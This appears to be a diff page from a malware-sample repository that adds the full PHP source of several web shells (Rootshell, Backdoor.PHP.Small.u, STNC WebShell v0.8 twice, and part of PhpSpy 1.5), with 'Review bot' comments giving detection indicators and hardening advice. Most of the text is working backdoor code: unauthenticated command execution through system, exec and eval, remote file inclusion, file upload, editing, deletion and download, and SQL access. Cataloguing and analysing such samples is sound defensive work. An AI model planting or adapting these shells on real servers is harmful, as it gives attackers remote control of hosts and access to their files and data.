<input name="filename" type="text" value="<?echo $filename;?>" size="20">
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Delete">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<font face="Verdana" style="font-size: 11pt">
<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
<input type="submit" name="submit" value="Save">
<input type="reset" value="Reset">
</form>
</td>
</tr>
<tr>
<td>
<h2><?echo $status;?></h2>
</td>
</tr>
</table> </td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<textarea rows="13" cols="55"></textarea><br>
&nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
</tr>
</table>
</center>
</div>
<br /></p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#FCFEBA" height="20">
<p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
</tr>
</table>
</center>
</div>
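Review bot: The sample's own changelog says password protection was removed in 1.0.0, and the code bears that out: `system($_POST['command'])`, `include($_POST['incl'])` (present twice) and the file editor's `unlink`/`fopen` on `$_POST["filename"]` are reached by any POST with no check. The upload handler and the Server Info block read bare globals (`$file`, `$file_name`, `$SERVER_SOFTWARE`), which are only populated under `register_globals` (removed in PHP 5.4). On a current runtime those parts are therefore inert, while the `<?php` blocks holding `system` and `include` still run, and the file editor additionally needs `short_open_tag` because it sits in a `<?` block. Detection should key on the POST fields `command`, `incl` and `filename` with `submit` values `Open`/`Delete`/`Save`, and on the banner text `This server has been infected by`, rather than on upload activity. A sidecar note such as `# unauthenticated web shell; sinks: system, include, fopen/unlink; upload path needs register_globals` would save the next analyst the read-through without touching the sample's hash.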

36
PHP/Backdoor.PHP.Small.u Normal file

@ -0,0 +1,36 @@
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
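Review bot: In the lines shown, this sample differs from PHP/Backdoor.PHP.Agent.fo only at `$res = join("n",$res);`, where the separator is the letter `n` rather than a newline, so the two files are near-duplicates filed under different family names with nothing recording the relation. A content signature written against the `"\n"` form of that line misses this variant. Matching on the `Mic22` marker together with the `exec`, `shell_exec`, `system`, `passthru`, `popen` fallback order covers both. I would record the link in a sidecar file rather than in the sample itself: `# near-duplicate of Backdoor.PHP.Agent.fo; differs in the join() separator only`.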

168
PHP/Backdoor.PHP.Stnc.a Normal file

@ -0,0 +1,168 @@
<?php
$version = "0.8";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
error_reporting(0);
if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }
/*
$login='root';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic");
die();
}
*/
function fe($s)
{return function_exists($s);}
function cmd($s)
{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
elseif(fe("shell_exec"))$r=shell_exec($s);
elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
else $r=`$s`;return $r;}
function safe_mode_is_on()
{return ini_get('safe_mode');}
function str100($s)
{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
function id()
{return str100(cmd("id"));}
function uname()
{return str100(cmd("uname -a"));}
function edit($size, $name, $val)
{ return "<input type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}
$action_edit = false;
$printline = "";
if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";
if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
$location = getcwd();
if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
.btn {background-color: #cfcfcf;} .pad {padding:5;}
</style><title> STNC WebShell v$version </title></head><body><table width=100%>
<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
echo htmlspecialchars($printline)."\n";
if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";
$result = htmlspecialchars(cmd($cmd));
if($result === "")
$result = cmd("ls -la");
echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();
if(!readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = fopen($fname, "w");
$fname = htmlspecialchars($fname);
if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
eval($code);
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname):"")."</center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
</td></tr></table></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></td></form></tr>
<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
?>
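Review bot: The HTTP Basic check sits entirely inside the `/* … */` block near the top, so as committed every action is unauthenticated: `eval($_POST["code"])`, `cmd($_POST["cmd"])`, `fopen($fname, "w")`, `copy($_FILES["file"]["tmp_name"], $fname)` and `readfile($fname)` are all reachable by a bare POST. `error_reporting(0)` suppresses PHP's own error reporting for these calls. Practical indicators are therefore the request shape (a POST field `action` with one of `cmd`, `edit`, `save`, `upload`, `eval`, `download`, usually alongside `pwd`) and the page title `STNC WebShell v0.8`. `cmd()` falls back through `exec`, `shell_exec`, `system`, `passthru`, `popen` and finally backticks, so hardening has to list all of the functions in `disable_functions` rather than a subset (the backtick operator is tied to `shell_exec`). The visible start of PHP/Backdoor.PHP.Stnc.b matches this file line for line; if the rest also matches, it is worth recording the two as one sample by hash in a sidecar note, `# Stnc.a / Stnc.b: same content? compare hashes; auth block commented out`.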

168
PHP/Backdoor.PHP.Stnc.b Normal file

@ -0,0 +1,168 @@
<?php
$version = "0.8";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
error_reporting(0);
if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }
/*
$login='root';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic");
die();
}
*/
function fe($s)
{return function_exists($s);}
function cmd($s)
{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
elseif(fe("shell_exec"))$r=shell_exec($s);
elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
else $r=`$s`;return $r;}
function safe_mode_is_on()
{return ini_get('safe_mode');}
function str100($s)
{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
function id()
{return str100(cmd("id"));}
function uname()
{return str100(cmd("uname -a"));}
function edit($size, $name, $val)
{ return "<input type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}
$action_edit = false;
$printline = "";
if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";
if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
$location = getcwd();
if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
.btn {background-color: #cfcfcf;} .pad {padding:5;}
</style><title> STNC WebShell v$version </title></head><body><table width=100%>
<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
echo htmlspecialchars($printline)."\n";
if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";
$result = htmlspecialchars(cmd($cmd));
if($result === "")
$result = cmd("ls -la");
echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();
if(!readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = fopen($fname, "w");
$fname = htmlspecialchars($fname);
if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
eval($code);
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname):"")."</center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
</td></tr></table></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></td></form></tr>
<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
?>
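Review bot: The access check in this sample is commented out (the block around `$login='root'` near the top), so as committed every `action` value (`cmd`, `edit`, `save`, `upload`, `download`, `eval`) is served to any client that can reach the file, and nothing stored with the sample records that. A sidecar analyst line such as `no auth; POST action=cmd|edit|save|upload|download|eval; response title "STNC WebShell v0.8"` would give responders strings to match in proxy or WAF captures, since POST bodies are usually absent from access logs. The tail of the preceding file section on this page matches this file's closing lines, so the two Stnc samples look like near-duplicates; that is inferred from the visible part only. Because this and the other samples in the commit are stored as plain PHP source, the checkout should be kept off any path a PHP handler serves.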

1840
PHP/Backdoor.PHP.TDshell.a Normal file

File diff suppressed because it is too large Load Diff

810
PHP/Backdoor.PHP.WebShell.a Normal file

@ -0,0 +1,810 @@
<?php
/*
+--------------------------------------------------------------------------+
| PhpSpy Version:1.5 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: July 22st(My mother's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1";
// 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证
// 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证
$admin['checkmode']="1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']="hkuser";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
/*===================== 身份验证 =====================*/
if($admin['check']=="1") {
if($admin['checkmode']=="1") {
/*------- session 验证 -------*/
session_start();
if ($_GET['action'] == "logout") {
session_destroy();
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
$_SESSION['adminpass'] = $admin['pass'];
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (session_is_registered('adminpass')) {
if ($_SESSION['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
} else {
/*------- cookie 验证 -------*/
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
}//end check
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP3 Generated Data');
@readfile($downfile);
exit;
}
}
// 程序目录(文件系统)
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
if (dir_writeable($nowpath)) {
$dir_writeable = "可写";
} else {
$dir_writeable = "不可写";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 1.5</title>
<style type="text/css">
.maintable {
background-color: "#FFFFFF";
border: "1px solid #115173";
}
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p>
<?php
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit;
}
?>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createfile"></td>
</tr>
</form>
<form action="" method="POST">
<tr>
<td colspan="2">新建目录在当前目录:
<input name="newdirectory" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createdirectory"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if(@$delfile!="") {
if(file_exists($delfile)) {
@unlink($delfile);
echo "".$delfile." 删除成功!";
} else {
echo "文件已不存在,删除失败!";
}
}
// 删除目录
elseif($_POST['action'] == "rmdir") {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "目录已不存在!";
} else {
deltree($deldirs);
}
} else {
echo "删除失败!";
}
}
// 创建目录
elseif($_POST['action'] == "createdirectory") {
if(!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if(file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif($_POST['action'] == "uploadfile") {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif($_POST['action'] == "doeditfile") {
$filename="$dir/$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
}
// 编辑文件属性
elseif($_POST['action'] == "editfileperm") {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";
echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
}
// 连接MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
if ($result) {
echo "SQL语句成功执行";
}else{
echo "出错: ".mysql_error();
}
mysql_close();
}
// 查看PHP配置参数状况
elseif($_POST['action'] == "viewphpvar") {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="40%"><b>文件</b></td>
<td align="center" nowrap width="20%"><b>修改日期</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="8%"><b>属性</b></td>
<td align="center" nowrap width="20%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="1"){
if($file!=".."&&$file!=".") {
$lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
$dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
$dir_i++;
}
}//while
@closedir($dirs);
// 文件列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file");
$size=$size/1024 ;
$size= @number_format($size, 3);
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
@$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
